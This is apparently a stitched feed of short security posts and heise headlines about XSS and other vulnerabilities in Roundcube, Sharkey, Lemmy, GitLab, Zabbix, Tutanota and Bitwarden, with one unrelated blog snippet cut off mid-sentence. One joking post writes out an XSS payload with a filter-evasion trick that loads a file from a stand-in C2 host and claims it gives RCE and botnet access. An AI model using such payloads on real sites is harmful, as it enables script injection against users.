Hot off the press! CISA adds CVE-2023-43770 (6.1 medium) Roundcube Webmail Persistent Cross-Site Scripting (XSS) Vulnerability to the Known Exploited Vulnerabilities (KEV) Catalog.
🔗 (to be replaced later) https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Why you should care about CVE-2023-43770:
ESET Research previously reported on 25 October 2023 that the Winter Vivern APT was exploiting a similar RoundCube cross-site scripting vulnerability CVE-2023-5631 as a zero-day against European overnmental entities and a think tank.
#Sharkey's recent vulnerability and their handling of it is still miles better than #Lemmy's #XSS exploit which actually took down a big instance and is something even more elementary than what Sharkey experienced.
Like seriously, the first thing you do when #Markdown parsing is involved is to sanitize the hell out of it, both in the Markdown input and the HTML output. And you put up a strict #CSP for good measure. Lemmy spectacularly failed on both counts, despite existing as a project for years and a lot more instances (and therefore users, which rivals #Mastodon) using their software!
I can cut some slack for the Sharkey devs here because:
they're relatively new (only months since the project started)
it only affected note imports from #Twitter which is already niche enough
it was easy to mitigate (just disable note import)
it didn't affect single-user instances IIUC
I haven't seen any Sharkey instance get actually exploited by this
they're taking steps to make sure this shit doesn't happen again (haven't seen this from Lemmy yet, and last I checked their CSP is still shit)
So this is not worth blowing over in the #fediverse. Your assessment is exaggerated, this energy could've been spent somewhere else, and you owe the Sharkey devs an apology.
A blog is something personal, and theming it just right is a challenge. You'll surely have noticed that the theme of Alien Pastures has been changed overnight.
This blog started out with a theme by Andreas Viklund (wp-andreas01) but that did not scale well on mobile devices, also it did weird stuff with user comments. I liked its v
Entwicklungsplattform: Neue GitLab-Versionen beheben zehn Sicherheitslücken
Neben Cross-Site-Scripting und Rechteproblemen beheben die neuen Versionen der Versionsverwaltung auch DoS-Lücken. Das GitLab-Team empfiehlt ein Update.
Sicherheitsforscher finden kritische Fehler in KI-Werkzeugen Ray, MLflow und H2O
Die beliebten Werkzeuge für KI-Anwendungen leiden unter Codeschmuggel, illegitimen Dateimanipulationen und anderen Bugs. Nicht immer sind Updates verfügbar.
Schwere Sicherheitslücken in Monitoring-Software Zabbix behoben
In verschiedenen Komponenten der Monitoringsoftware Zabbix klafften kritische Sicherheitslücken, die Angreifern die Ausführung eigenen Codes ermöglichen.
I'm usually a grey hat but my evil brain commands me to insert that crafted webp image (#libwebp ) and upload that to popular websites using #XSS </scrip</script>t><img src ="https:myc2server.fy/payload.webp" onerror=prompt(8)> and get RCE into users computers and add them to the botnet lol
Prevention : add .webp extention to ublock origin custom rules or on the whole DNS level.
Introducing Session Hijacking Visual Exploitation (SHVE): A new tool for taking #xss exploitation to the next level - remotely viewing a target's browser
@Tutanota I see that there have been a few #XSS vulnerabilities in the clients in the past. In that case, the client credentials could be stolen from the client.
Is there any mitigation in place for this? Like, would the credentials not be accepted if coming from a different IP, something like that?
Of course the protections against XSS are valuable. But we can't assume there won't be more vulnerabilities in the future.
#Bitwarden, like most cloud-based password managers, has a web vault.Imagine a stored #XSS on that. All your passwords stolen.
Thankfully, you probably aren't viewing untrusted content if you're an individual user (you put the data in yourself and now you're getting it back out). But for organization users, where you can see things created by someone else on your subscription? That could be possible.